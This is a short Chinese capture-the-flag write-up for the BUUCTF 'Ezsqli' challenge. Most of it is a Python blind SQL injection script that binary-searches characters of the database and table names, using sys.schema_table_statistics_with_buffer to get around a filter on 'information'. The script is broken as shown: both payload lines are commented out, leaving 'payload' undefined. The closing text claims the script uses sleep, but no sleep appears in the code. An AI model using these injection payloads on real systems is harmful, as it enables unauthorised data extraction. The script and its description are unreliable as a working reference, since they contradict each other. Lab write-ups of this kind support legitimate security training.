Ezsqli

过滤了information，表名靠 schema_table_statistics_with_buffer 注

import requests

if __name__ == "__main__":
    url = "http://53707f57-a533-4f9f-9627-6535095886c9.node4.buuoj.cn:81/index.php"
    i = 0
    result = ""
    while True:
        i = i + 1
        head = 32
        tail = 127
        while head < tail:
            mid = (head + tail) >> 1
            # payload = {'id': f'if(ascii(substr(database(),{i},1))>{mid},1,2)'}
            # payload = {'id': f'if(ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{i},1))>{mid},1,2)'}

            res = requests.post(url=url, data=payload)
            if 'Nu1L' in res.text:
                head = mid + 1
            else:
                tail = mid

        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

利用ascii偏移出flag，这里用了脚本，值得注意的是这里用了sleep，避免请求太多被buu过滤了。当然这个脚本还有很多可以完善的地方。